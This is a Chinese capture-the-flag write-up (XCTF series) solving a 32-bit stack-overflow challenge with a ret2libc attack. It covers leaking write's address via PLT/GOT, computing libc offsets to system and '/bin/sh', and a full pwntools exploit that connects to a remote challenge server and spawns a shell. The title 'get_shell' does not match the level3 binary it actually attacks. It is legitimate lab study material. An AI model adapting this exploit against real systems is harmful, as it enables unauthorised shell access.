攻防世界(10):get_shell
查壳,只开了NX,可以去拿shell
看ida,的确找不到system有关的函数,但发现了read的漏洞(read开的大小为100,比buf大),只能去拿附件中的另一个文件下手,这是一个运行库文件通过它来获得两者的地址
使用 pwntools,获得 write 和 system 的相对位置,0x99a80
from pwn import *
elf = ELF('./libc_32.so.6')
print(hex(elf.symbols['system']-elf.symbols['write']))
然后使用ROPgadget获得字符串 "/bin/sh" 相对于 write 的位置,write的位置可以用readelf -s libc_32.so.6|grep write查到,相对位置0x84C6B
ROPgadget --binary libc_32.so.6 --string "/bin/sh"
我们通过 got 来获得 write 的地址,并通过 plt 来调用它,所以针对前面的栈溢出漏洞可以构造,从 p32(1) 开始为 write 的三个参数
payload = b'a'*0x8c+p32(elf.plt['write'])+b'aaaa'+p32(1)+p32(elf.got['write'])+p32(10)
由于开启了 PIE 和 ASLR,库函数每次的地址都会改变,所以上面 b'aaaa' 的部分需要被改为 p32(elf.symbols['main'])进行重定位
通过 u32(p.recv()[:4]) 即可获得 write 的地址,u32 可以看作是 p32 的逆操作,它的参数 p.recv()[:4] ,是取输出的前 4 个 byte,在 32 位程序中,地址只需要 4 个 byte 来表示
构造第二个 payload 为
payload = b'a'*0x8c+p32(write_addr-0x99a80)+b'aaaa'+p32(write_addr+0x84c6b)
exp如下
from pwn import *
p = remote('111.200.241.244', 56394)
elf = ELF('./level3')
payload = b'0'*0x8c+p32(elf.plt['write'])+p32(elf.symbols['main'])+p32(1)+p32(elf.got['write'])+p32(10)
p.recv()
p.sendline(payload)
write_addr = u32(p.recv()[:4])
payload = b'0'*0x8c+p32(write_addr-0x99a80)+b'0000'+p32(write_addr+0x84c6b)
p.sendline(payload)
p.interactive()